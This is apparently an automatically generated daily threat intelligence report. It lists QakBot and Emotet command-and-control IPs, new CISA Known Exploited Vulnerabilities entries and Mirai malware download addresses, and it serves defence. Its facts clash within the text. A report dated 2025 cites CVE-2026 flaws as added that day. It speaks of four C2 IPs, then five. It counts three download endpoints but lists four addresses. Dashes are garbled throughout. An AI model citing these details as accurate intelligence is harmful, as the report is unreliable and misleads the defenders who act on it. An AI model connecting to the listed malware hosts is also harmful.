Daily Threat Intelligence Report โ 2025-07-14
Today's threat landscape is dominated by active QakBot and Emotet command-and-control infrastructure confirmed by Feodotracker, with four C2 IPs spanning US, UK, and Japanese infrastructure actively serving malicious traffic. Concurrently, CISA has added five critical vulnerabilities to the Known Exploited Vulnerabilities catalogue, including a critical unauthenticated RCE in Palo Alto Networks PAN-OS (CVE-2026-0300) and an authentication bypass in cPanel & WHM (CVE-2026-41940), both of which represent immediate exploitation risk to enterprise environments. A sustained Mirai botnet campaign targeting Linux-based IoT and server infrastructure is evidenced by multiple ELF-format samples and active malware download URLs observed via URLhaus and MalwareBazaar. SOC teams should immediately block all five Feodotracker C2 IPs, apply CISA KEV patches on an emergency basis, and activate KQL hunts across MDE and Sentinel environments.
Active QakBot and Emotet C2 Infrastructure โ Multi-Region Banking Trojan Campaign
CRITICAL TA505Feodotracker has confirmed five active command-and-control IP addresses in the last 24 hours serving QakBot (four IPs: 50.16.16.211, 34.204.119.63, 178.62.3.223, 27.133.154.218) and Emotet (one IP: 162.243.103.246) malware families, spanning US, UK, and Japanese hosting infrastructure. QakBot is a sophisticated banking trojan and initial access broker payload historically leveraged by TA505 and affiliated ransomware operators to establish persistent footholds prior to post-exploitation activity including credential harvesting, lateral movement, and ransomware deployment. Emotet, previously dismantled by law enforcement in 2021 and subsequently resurrected, operates as a modular malware loader and spam botnet that downloads secondary payloads including QakBot itself, representing a compounding risk when both families are simultaneously active. Any outbound connection from an enterprise endpoint to these five IPs should be treated as a confirmed compromise indicator requiring immediate endpoint isolation and forensic investigation.
Critical CISA KEV Additions โ Unauthenticated RCE in PAN-OS and Authentication Bypass in cPanel/WHM Demand Emergency Patching
HIGH Unknown Threat ActorCISA has added five vulnerabilities to the Known Exploited Vulnerabilities catalogue today, with two representing the highest immediate risk to enterprise environments: CVE-2026-0300 in Palo Alto Networks PAN-OS, an out-of-bounds write vulnerability in the User-ID Authentication Portal (Captive Portal) service allowing unauthenticated remote code execution with root privileges on PA-Series and VM-Series firewalls; and CVE-2026-41940 in WebPros cPanel & WHM, an authentication bypass in the login flow enabling unauthenticated remote attackers to gain full control panel access. Additionally, CVE-2026-6973 in Ivanti EPMM allows authenticated remote code execution for any administrator-level user, CVE-2026-42208 in BerriAI LiteLLM enables SQL injection leading to credential theft from AI proxy infrastructure, and CVE-2026-31431 in the Linux Kernel enables local privilege escalation via incorrect resource transfer. CISA's inclusion of these vulnerabilities in the KEV catalogue confirms active in-the-wild exploitation; federal agencies are under BOD 22-01 mandate to patch, and private sector organizations should treat these as emergency remediation priorities.
Active Mirai/Gafgyt Botnet Expansion Campaign โ Multiple ELF Samples and IoT Exploitation Infrastructure Observed
MEDIUM Unknown Threat ActorMalwareBazaar has confirmed four distinct Mirai-family ELF binary samples in the last 24 hours, including one tagged with Gafgyt (a competing IoT botnet family sharing infrastructure overlap with Mirai), indicating active botnet expansion recruitment targeting Linux-based IoT devices, routers, and unpatched servers. URLhaus corroborates this campaign with three active malware download endpoints serving shell scripts and binaries via non-standard high ports from IP addresses 119.52.128.201, 140.237.38.80, 117.26.82.69, and 42.235.88.133, with payloads including bin.sh (shell-based dropper) and unlabeled binary downloads. The CVE-2026-31431 Linux kernel privilege escalation vulnerability added to CISA KEV today may be leveraged by botnet operators to elevate privileges on partially compromised Linux hosts to achieve persistent Mirai implantation. GitHub maltrail updates to netsupport.txt and fakeapp.txt further suggest parallel delivery of remote access tools via fake application lures that may serve as the initial infection vector for compromised endpoints subsequently recruited into the botnet.